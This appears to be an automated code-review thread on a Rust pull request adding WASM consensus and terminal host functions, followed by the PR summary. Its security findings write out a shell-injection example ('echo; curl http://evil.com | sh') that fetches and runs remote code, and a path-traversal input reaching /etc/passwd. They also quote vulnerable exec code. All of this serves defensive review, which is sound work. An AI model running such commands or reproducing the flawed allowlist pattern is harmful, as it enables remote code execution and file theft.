pub fn host_consensus_get_validators() -> Result<Vec<u8>, i32> {
    let mut buf = vec![0u8; 65536];
    let status = unsafe { consensus_get_validators(buf.as_mut_ptr() as i32, buf.len() as i32) };
    if status < 0 {
        return Err(status);
    }
    buf.truncate(status as usize);
    Ok(buf)
}
```
Disabled status (positive 1) slips through the status < 0 error check, causing data corruption.
The host-side ConsensusHostStatus::Disabled has value 1 (positive). When the host returns 1 for a disabled consensus, these wrappers treat it as a successful response of 1 byte, truncating the zero-initialized buffer to a single byte and returning Ok(vec![0]). The caller will misinterpret garbage as valid validator/vote data.
This applies to host_consensus_get_validators and host_consensus_get_votes. The same class of bug exists for host_consensus_get_state_hash (Line 262) where status == 1 is treated as success, though the impact there is returning a zeroed hash rather than corrupt data.
🐛 Proposed fix: check for positive non-success status codes

```diff
 pub fn host_consensus_get_validators() -> Result<Vec<u8>, i32> {
     let mut buf = vec![0u8; 65536];
     let status = unsafe { consensus_get_validators(buf.as_mut_ptr() as i32, buf.len() as i32) };
-    if status < 0 {
+    if status < 0 || status == 1 {
+        // 1 = Disabled
         return Err(status);
     }
     buf.truncate(status as usize);
     Ok(buf)
 }

 pub fn host_consensus_get_votes() -> Result<Vec<u8>, i32> {
     let mut buf = vec![0u8; 65536];
     let status = unsafe { consensus_get_votes(buf.as_mut_ptr() as i32, buf.len() as i32) };
-    if status < 0 {
+    if status < 0 || status == 1 {
+        // 1 = Disabled
         return Err(status);
     }
     buf.truncate(status as usize);
     Ok(buf)
 }
```

Alternatively, consider a more robust fix: change `ConsensusHostStatus::Disabled` to a negative value (e.g., -10) in consensus.rs so all non-success statuses are negative, aligning with the error-detection pattern used throughout the SDK. The same issue exists for `TerminalHostStatus::Disabled = 1` in terminal.rs.
Also applies to: 252-260
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/challenge-sdk-wasm/src/host_functions.rs` around lines 234 - 242, The
wrappers host_consensus_get_validators, host_consensus_get_votes and
host_consensus_get_state_hash treat a returned status of 1
(ConsensusHostStatus::Disabled) as success and truncate the buffer; update each
function to treat status == 1 as an error (i.e., return Err(status)) rather than
truncating/returning data — only treat genuinely successful status values as
success (e.g., status > 1 for payload-returning calls), and keep the existing
negative-error check; change the conditional around the unsafe consensus_* call
in host_consensus_get_validators, host_consensus_get_votes and
host_consensus_get_state_hash to explicitly return Err(status) when status == 1
(or otherwise not in the valid-success range) so disabled responses are not
misinterpreted as data.
```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(i32)]
pub enum ConsensusHostStatus {
    Success = 0,
    Disabled = 1,
    BufferTooSmall = -1,
    ProposalLimitExceeded = -2,
    InvalidArgument = -3,
    InternalError = -100,
}
```
Disabled = 1 (positive) is the root cause of the SDK-side data corruption bug.
ConsensusHostStatus::Disabled = 1 is the only non-success status with a positive value. This breaks the convention used by SDK wrappers (status < 0 → error). Functions returning buffer sizes (like handle_get_validators) will cause the SDK to misinterpret 1 as "1 byte written."
Consider making all non-success statuses negative, or at minimum, making Disabled negative.
🐛 Proposed fix

```diff
 pub enum ConsensusHostStatus {
     Success = 0,
-    Disabled = 1,
+    Disabled = -10,
     BufferTooSmall = -1,
     ProposalLimitExceeded = -2,
     InvalidArgument = -3,
     InternalError = -100,
 }
```
}Update from_i32 accordingly:
```diff
 pub fn from_i32(code: i32) -> Self {
     match code {
         0 => Self::Success,
-        1 => Self::Disabled,
+        -10 => Self::Disabled,
         -1 => Self::BufferTooSmall,
         -2 => Self::ProposalLimitExceeded,
         -3 => Self::InvalidArgument,
         _ => Self::InternalError,
     }
 }
```

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/wasm-runtime-interface/src/consensus.rs` around lines 30 - 39, The
enum ConsensusHostStatus has a positive value for Disabled which breaks the SDK
convention that non-success statuses are negative; change
ConsensusHostStatus::Disabled to a negative value (e.g., -1 or another unused
negative code) and update any conversion/mapper (e.g., from_i32 or match arms
that map i32→ConsensusHostStatus) to reflect the new negative value so SDK
wrappers that treat status<0 as error work correctly; ensure no other variant
collisions occur when renumbering.
```rust
let mut child = cmd
    .spawn()
    .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?;

if has_stdin {
    if let Some(ref stdin_data) = request.stdin {
        if let Some(ref mut stdin) = child.stdin {
            use std::io::Write;
            let _ = stdin.write_all(stdin_data);
        }
    }
    child.stdin.take();
}

let output = loop {
    if start.elapsed() > timeout {
        let _ = child.kill();
        return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs()));
    }
    match child.try_wait() {
        Ok(Some(_)) => {
            break child
                .wait_with_output()
                .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?
        }
        Ok(None) => std::thread::sleep(Duration::from_millis(10)),
        Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())),
    }
};
```
Potential deadlock when writing stdin to a child process with piped stdout/stderr.
If the child process produces enough output to fill the OS pipe buffer for stdout/stderr before consuming all its stdin, write_all on line 436 will block waiting for the child to read, while the child is blocked waiting for us to read its stdout. This is a classic deadlock scenario with synchronous piped I/O (the Rust std::process docs warn about this). The timeout loop on lines 442–456 would never be reached.
Consider writing stdin in a separate thread, or using wait_with_output() (which handles the I/O concurrently) after spawning the child with stdin pre-written via a separate thread.
Sketch of a safer approach

```diff
-    let mut child = cmd
-        .spawn()
-        .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?;
-
-    if has_stdin {
-        if let Some(ref stdin_data) = request.stdin {
-            if let Some(ref mut stdin) = child.stdin {
-                use std::io::Write;
-                let _ = stdin.write_all(stdin_data);
-            }
-        }
-        child.stdin.take();
-    }
-
-    let output = loop {
-        if start.elapsed() > timeout {
-            let _ = child.kill();
-            return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs()));
-        }
-        match child.try_wait() {
-            Ok(Some(_)) => {
-                break child
-                    .wait_with_output()
-                    .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?
-            }
-            Ok(None) => std::thread::sleep(Duration::from_millis(10)),
-            Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())),
-        }
-    };
+    let mut child = cmd
+        .spawn()
+        .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?;
+
+    // Write stdin on a separate thread to avoid deadlock with piped stdout/stderr
+    if has_stdin {
+        let stdin_data = request.stdin.clone().unwrap_or_default();
+        let mut child_stdin = child.stdin.take().unwrap();
+        std::thread::spawn(move || {
+            use std::io::Write;
+            let _ = child_stdin.write_all(&stdin_data);
+            // child_stdin is dropped here, closing the pipe
+        });
+    }
+
+    let output = loop {
+        if start.elapsed() > timeout {
+            let _ = child.kill();
+            return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs()));
+        }
+        match child.try_wait() {
+            Ok(Some(_)) => {
+                break child
+                    .wait_with_output()
+                    .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?
+            }
+            Ok(None) => std::thread::sleep(Duration::from_millis(10)),
+            Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())),
+        }
+    };
```
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/wasm-runtime-interface/src/sandbox.rs` around lines 428 - 456, The
current synchronous write_all to child.stdin after spawning (in the block
referencing cmd.spawn(), has_stdin, request.stdin, write_all and child.stdin)
can deadlock if the child fills stdout/stderr buffers before reading stdin; move
stdin writing off the main thread by spawning a dedicated thread to take
child.stdin, write_all the bytes, and then drop/close it (or use
wait_with_output which concurrently handles stdio) before entering the existing
timeout loop that polls child.try_wait() and uses wait_with_output; ensure the
writer thread is detached or joined appropriately and that errors from the write
are converted to SandboxExecError::ExecutionFailed so the timeout/kill logic
(start, timeout, child.kill, SandboxExecError::ExecutionTimeout) still functions
correctly.
```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(i32)]
pub enum TerminalHostStatus {
    Success = 0,
    Disabled = 1,
    CommandNotAllowed = -1,
    PathNotAllowed = -2,
    FileTooLarge = -3,
    BufferTooSmall = -4,
    IoError = -5,
    LimitExceeded = -6,
    Timeout = -7,
    InternalError = -100,
}
```
Disabled = 1 (positive) breaks the SDK's status < 0 error-detection pattern.
TerminalHostStatus::Disabled is set to 1, but SDK-side wrappers (e.g., host_terminal_exec) use status < 0 to detect errors. When terminal is disabled, the host returns 1, which the SDK interprets as "1 byte of data written successfully." Consider changing Disabled to a negative value to align with the error-detection convention.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 30 - 43,
TerminalHostStatus::Disabled is currently set to a positive value (1) which
breaks the SDK's error-detection pattern (status < 0); change the Disabled
variant in the TerminalHostStatus enum to a negative error code (e.g., -8 or
another unused negative value) so it is treated as an error by SDK wrappers like
host_terminal_exec, and update any related docs/tests/constants that assume the
old value.
```rust
pub fn is_path_allowed(&self, path: &str) -> bool {
    if !self.enabled {
        return false;
    }
    if self.allowed_paths.is_empty() {
        return true;
    }
    self.allowed_paths.iter().any(|p| path.starts_with(p))
}
```
Critical: Path traversal via .. components bypasses is_path_allowed.
is_path_allowed uses a simple path.starts_with(p) check without canonicalizing the path. A WASM module can pass "/tmp/../etc/passwd" which passes the /tmp prefix check but resolves to /etc/passwd when std::fs::read is called.
Proposed fix: canonicalize before checking

```diff
 pub fn is_path_allowed(&self, path: &str) -> bool {
     if !self.enabled {
         return false;
     }
     if self.allowed_paths.is_empty() {
         return true;
     }
-    self.allowed_paths.iter().any(|p| path.starts_with(p))
+    // Canonicalize to resolve ".." and symlinks before checking the prefix
+    let canonical = match std::fs::canonicalize(path) {
+        Ok(p) => p,
+        // For write operations the file may not exist yet; resolve the parent
+        Err(_) => {
+            let parent = std::path::Path::new(path).parent();
+            match parent.and_then(|p| std::fs::canonicalize(p).ok()) {
+                Some(p) => p,
+                None => return false,
+            }
+        }
+    };
+    let canonical_str = canonical.to_string_lossy();
+    self.allowed_paths.iter().any(|p| canonical_str.starts_with(p))
 }
```

Also applies to: 397-409
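When `std::fs::canonicalize` is awkward (the target may not exist yet, or symlink resolution is undesirable), a purely lexical normalization of `.`/`..` components is an alternative; a sketch, not the PR's code:

```rust
use std::path::{Component, Path, PathBuf};

// Lexically resolve "." and ".." without touching the filesystem.
// Rejects paths that try to escape above the root via "..".
fn normalize(path: &str) -> Option<PathBuf> {
    let mut out = PathBuf::new();
    for comp in Path::new(path).components() {
        match comp {
            Component::RootDir | Component::Prefix(_) => out.push(comp),
            Component::CurDir => {}
            Component::ParentDir => {
                if !out.pop() {
                    return None; // escaped above the root
                }
            }
            Component::Normal(c) => out.push(c),
        }
    }
    Some(out)
}

fn is_allowed(path: &str, allowed: &[&str]) -> bool {
    match normalize(path) {
        // Path::starts_with compares whole components, so "/tmpfoo"
        // does not match an allowed prefix of "/tmp".
        Some(p) => allowed.iter().any(|a| p.starts_with(a)),
        None => false,
    }
}
```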
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 139 - 147, The
is_path_allowed function currently checks prefixes with path.starts_with(p)
which allows path traversal like "/tmp/../etc/passwd"; change the check to
compare normalized/canonicalized paths: normalize the incoming path (resolve
"."/".." components and make it absolute) and normalize the stored allowed_paths
before comparison (or canonicalize both using std::fs::canonicalize where
possible), and on any canonicalization/error return false; update the same
prefix-check logic in the other occurrence of this permission check so
comparisons use normalized absolute paths rather than raw starts_with.
```rust
fn handle_terminal_exec(
    caller: &mut Caller<RuntimeState>,
    cmd_ptr: i32,
    cmd_len: i32,
    result_ptr: i32,
    result_len: i32,
) -> i32 {
    let enabled = caller.data().terminal_state.policy.enabled;
    if !enabled {
        return TerminalHostStatus::Disabled.to_i32();
    }

    let cmd_bytes = match read_wasm_memory(caller, cmd_ptr, cmd_len) {
        Ok(bytes) => bytes,
        Err(err) => {
            warn!(error = %err, "terminal_exec: failed to read command from wasm memory");
            return TerminalHostStatus::InternalError.to_i32();
        }
    };

    let cmd_str = match std::str::from_utf8(&cmd_bytes) {
        Ok(s) => s.to_string(),
        Err(_) => return TerminalHostStatus::InternalError.to_i32(),
    };

    let command_name = cmd_str.split_whitespace().next().unwrap_or("").to_string();

    {
        let state = &caller.data().terminal_state;
        if !state.policy.is_command_allowed(&command_name) {
            warn!(
                challenge_id = %state.challenge_id,
                command = %command_name,
                "terminal_exec: command not allowed"
            );
            return TerminalHostStatus::CommandNotAllowed.to_i32();
        }
        if state.executions >= state.policy.max_executions {
            return TerminalHostStatus::LimitExceeded.to_i32();
        }
    }

    let timeout_ms = caller.data().terminal_state.policy.timeout_ms;
    let max_output = caller.data().terminal_state.policy.max_output_bytes;

    let output = match Command::new("sh")
        .arg("-c")
        .arg(&cmd_str)
        .stdin(std::process::Stdio::null())
        .stdout(std::process::Stdio::piped())
        .stderr(std::process::Stdio::piped())
        .spawn()
    {
        Ok(child) => {
            let start = std::time::Instant::now();
            let timeout = Duration::from_millis(timeout_ms);
            match child.wait_with_output() {
                Ok(out) => {
                    if start.elapsed() > timeout {
                        return TerminalHostStatus::Timeout.to_i32();
                    }
                    out
                }
                Err(err) => {
                    warn!(error = %err, "terminal_exec: command wait failed");
                    return TerminalHostStatus::IoError.to_i32();
                }
            }
        }
        Err(err) => {
            warn!(error = %err, "terminal_exec: command spawn failed");
            return TerminalHostStatus::IoError.to_i32();
        }
    };

    caller.data_mut().terminal_state.executions += 1;

    let mut result_data = output.stdout;
    if result_data.len() > max_output {
        result_data.truncate(max_output);
    }

    if result_len < 0 || result_data.len() > result_len as usize {
        return TerminalHostStatus::BufferTooSmall.to_i32();
    }

    if let Err(err) = write_wasm_memory(caller, result_ptr, &result_data) {
        warn!(error = %err, "terminal_exec: failed to write result to wasm memory");
        return TerminalHostStatus::InternalError.to_i32();
    }

    result_data.len() as i32
}
```
Critical: Command allowlist is trivially bypassed and timeout is ineffective.

Two serious security issues in `handle_terminal_exec`:

1. Allowlist bypass: Line 308 extracts only the first word as `command_name`, but lines 328-330 always execute via `sh -c <entire_cmd_str>`. A WASM module sending `"echo; curl http://evil.com | sh"` passes the check (since `"echo"` is allowed) but executes arbitrary shell commands. The allowlist provides no real protection.

2. Blocking + ineffective timeout: `child.wait_with_output()` (line 339) blocks until the process exits. The timeout check at line 341 only runs after the process has already completed, so `sleep 99999` will block the WASM host thread indefinitely. You need to use a `tokio::process::Command` with timeout, or poll the child in a loop with a deadline, or use `child.try_wait()` in a spin loop.
Sketch for a safer exec approach

```diff
-    let command_name = cmd_str.split_whitespace().next().unwrap_or("").to_string();
+    // Parse the command properly: only allow direct execution of the binary,
+    // not shell interpretation. Reject commands containing shell metacharacters.
+    let parts: Vec<&str> = cmd_str.split_whitespace().collect();
+    let command_name = parts.first().copied().unwrap_or("");
     {
         let state = &caller.data().terminal_state;
         if !state.policy.is_command_allowed(&command_name) {
             // ...
         }
     }
-    let output = match Command::new("sh")
-        .arg("-c")
-        .arg(&cmd_str)
+    let output = match Command::new(command_name)
+        .args(&parts[1..])
         .stdin(std::process::Stdio::null())
         .stdout(std::process::Stdio::piped())
         .stderr(std::process::Stdio::piped())
         .spawn()
```

For timeout enforcement, use a polling loop with `child.try_wait()` or spawn the process on a background thread with a kill deadline.
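A sketch of that polling loop, factored as a std-only helper; the names are illustrative, not the crate's API:

```rust
use std::process::{Child, Output};
use std::time::{Duration, Instant};

// Poll the child until it exits or the deadline passes; kill it on timeout.
// Callers should still bound or drain piped output, since a full pipe can
// delay the child's exit.
fn wait_with_deadline(mut child: Child, timeout: Duration) -> std::io::Result<Option<Output>> {
    let deadline = Instant::now() + timeout;
    loop {
        match child.try_wait()? {
            // Exited: collect stdout/stderr from the already-finished process.
            Some(_) => return child.wait_with_output().map(Some),
            None => {
                if Instant::now() >= deadline {
                    let _ = child.kill();
                    let _ = child.wait(); // reap to avoid a zombie
                    return Ok(None); // None = timed out
                }
                std::thread::sleep(Duration::from_millis(10));
            }
        }
    }
}
```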
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 283 - 375,
handle_terminal_exec currently validates only the first token (command_name) but
then runs the entire cmd_str via "sh -c", and it blocks on
child.wait_with_output(), allowing allowlist bypass and hanging; fix by (1)
rejecting or sanitizing any shell metacharacters in cmd_str or, better, parse
cmd_str into an argv vector and execute the binary directly
(Command::new(&argv[0]).args(&argv[1..])) so no shell interpretation occurs —
update the use of command_name/cmd_str parsing and the spawn call accordingly —
and (2) replace the blocking child.wait_with_output() with a nonblocking timeout
implementation (use child.try_wait() in a loop with
Instant::now()+Duration::from_millis(timeout_ms) and sleep small intervals,
killing the child via child.kill() if deadline exceeded, or run the child on a
background thread and join with a timeout) so timeout_ms is enforced; adjust
error returns/logs in handle_terminal_exec to reflect killed/timeouts.
```rust
fn handle_terminal_random_seed(
    caller: &mut Caller<RuntimeState>,
    buf_ptr: i32,
    buf_len: i32,
) -> i32 {
    if buf_len <= 0 {
        return TerminalHostStatus::InternalError.to_i32();
    }

    let len = buf_len as usize;
    let mut seed = vec![0u8; len];

    // Use a deterministic seed based on challenge_id and timestamp for reproducibility
    let challenge_id = caller.data().challenge_id.clone();
    let ts = caller
        .data()
        .fixed_timestamp_ms
        .unwrap_or_else(|| chrono::Utc::now().timestamp_millis());

    use sha2::{Digest, Sha256};
    let mut hasher = Sha256::new();
    hasher.update(challenge_id.as_bytes());
    hasher.update(ts.to_le_bytes());
    let hash = hasher.finalize();

    for (i, byte) in seed.iter_mut().enumerate() {
        *byte = hash[i % 32];
    }

    if let Err(err) = write_wasm_memory(caller, buf_ptr, &seed) {
        warn!(error = %err, "terminal_random_seed: failed to write to wasm memory");
        return TerminalHostStatus::InternalError.to_i32();
    }

    TerminalHostStatus::Success.to_i32()
}
```
Random seed is not truly deterministic across validators for the same challenge.
handle_terminal_random_seed uses challenge_id + timestamp to derive a seed. When fixed_timestamp_ms is None, it falls back to chrono::Utc::now() (line 582), which will differ across validators and produce different seeds for the same challenge. This breaks the deterministic execution guarantee for challenges unless fixed_timestamp_ms is always set.
Additionally, the seed only varies by challenge_id and timestamp — calling it multiple times within the same millisecond returns the same bytes. Consider incorporating a call counter.
Based on learnings: "Challenge evaluation must execute deterministically within the WASM runtime sandbox."
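A sketch of the counter-based derivation suggested above, with the counter assumed to live on `RuntimeState` (modeled here as a plain struct):

```rust
use sha2::{Digest, Sha256};

struct RuntimeState {
    challenge_id: String,
    terminal_seed_counter: u64, // assumed new field
}

// Deterministic across validators: depends only on challenge_id and how many
// times the guest has asked for a seed, never on wall-clock time.
fn next_seed(state: &mut RuntimeState, len: usize) -> Vec<u8> {
    let mut hasher = Sha256::new();
    hasher.update(state.challenge_id.as_bytes());
    hasher.update(state.terminal_seed_counter.to_le_bytes());
    state.terminal_seed_counter += 1;
    let hash = hasher.finalize();
    (0..len).map(|i| hash[i % 32]).collect()
}
```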
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 565 - 600,
handle_terminal_random_seed currently uses chrono::Utc::now() when
fixed_timestamp_ms is None which yields non-deterministic seeds across
validators; change to only use deterministic inputs (challenge_id and a
deterministic per-call counter stored on RuntimeState) and fail if
fixed_timestamp_ms is not set or omit timestamp entirely. Specifically: in
handle_terminal_random_seed, remove the chrono::Utc fallback and instead read a
call counter field on RuntimeState (e.g., add or use
runtime_state.terminal_seed_counter), include that counter and challenge_id in
the Sha256 input (hasher.update(counter.to_le_bytes())), then increment and
persist the counter back to caller.data() before returning; if you must use a
timestamp require fixed_timestamp_ms to be Some and return
TerminalHostStatus::InternalError when it is None so seeds remain deterministic
across validators. Ensure the unique symbols mentioned
(handle_terminal_random_seed, fixed_timestamp_ms, RuntimeState,
terminal_seed_counter, write_wasm_memory) are updated accordingly.
Summary
Implement comprehensive P2P infrastructure and WASM host function support so that future WASM challenges can operate end-to-end on the decentralized network without any centralized server. This adds new host function namespaces, extends the P2P message protocol, and enriches consensus state for full challenge lifecycle management.
Changes
WASM Runtime (`crates/wasm-runtime-interface/`)
- `consensus.rs`: `platform_consensus` host function namespace with `ConsensusPolicy`, `ConsensusState`, and `ConsensusHostFunctions` — exposes `consensus_get_epoch`, `consensus_get_validators`, `consensus_propose_weight`, `consensus_get_votes`, `consensus_get_state_hash`, `consensus_get_submission_count`, `consensus_get_block_height`
- `terminal.rs`: `platform_terminal` host function namespace with `TerminalPolicy`, `TerminalState`, and `TerminalHostFunctions` — implements `terminal_exec`, `terminal_read_file`, `terminal_write_file`, `terminal_list_dir`, `terminal_get_time`, `terminal_random_seed` with path/command allow-listing
- `sandbox.rs`: implement `HostFunctionRegistrar` for `SandboxHostFunctions` with real Wasmtime linker registration for `sandbox_exec`, `get_timestamp`, `log_message`
- `runtime.rs`: register all new host function namespaces (consensus, terminal, sandbox, exec, time) in `WasmRuntime::instantiate()`; add `ConsensusState` and `TerminalState` to `RuntimeState`; add `ConsensusPolicy` and `TerminalPolicy` to `InstanceConfig`

P2P Consensus (`crates/p2p-consensus/`)
- New `P2PMessage` variants (appended at the end of the enum for bincode backward compatibility): `JobClaim`, `JobAssignment`, `DataRequest`, `DataResponse`, `TaskProgress`, `TaskResult`, `LeaderboardRequest`, `LeaderboardResponse`, `ChallengeUpdate`, `StorageProposal`, `StorageVote` — with full message structs
- `ChainState`: added `leaderboard`, `active_jobs`, `task_progress`, `challenge_storage_roots` fields with methods `assign_job()`, `complete_job()`, `update_leaderboard()`, `get_leaderboard()`, `update_task_progress()`, `update_challenge_storage_root()`, `cleanup_stale_jobs()` — all with proper sequence increment and hash update

Validator Node (`bins/validator-node/`)
- `challenge_storage.rs`: `ChallengeStorageBackend` implementing the `StorageBackend` trait, backed by real `LocalStorage` from `distributed-storage` — replaces `NoopStorageBackend` for production use
- `main.rs`: handle all new P2P message types in `handle_network_event()` with proper logging and state updates; add a stale-job cleanup periodic task (120s interval); handle previously unmatched messages (`StateRequest`, `StateResponse`, `WeightVote`, `PeerAnnounce`)
- `wasm_executor.rs`: wire `ConsensusPolicy` and `TerminalPolicy` into `InstanceConfig`; upgrade the storage backend from `NoopStorageBackend` to `InMemoryStorageBackend`

Challenge SDK WASM (`crates/challenge-sdk-wasm/`)
- `host_functions.rs`: add a `platform_consensus` extern block with all consensus host function imports and safe Rust wrappers (`host_consensus_get_epoch`, `host_consensus_get_validators`, `host_consensus_propose_weight`, etc.)

Notes
- `P2PMessage` variants are added at the end of the enum to maintain bincode serialization backward compatibility
- No breaking changes to the existing `EvaluationInput`/`EvaluationOutput` serialization format
- `ChallengeStorageBackend` is placed in `validator-node` (not `wasm-runtime-interface`) to avoid a cyclic dependency through `distributed-storage` → `platform-core` → `wasm-runtime-interface`

Summary by CodeRabbit
Release Notes
New Features
Chores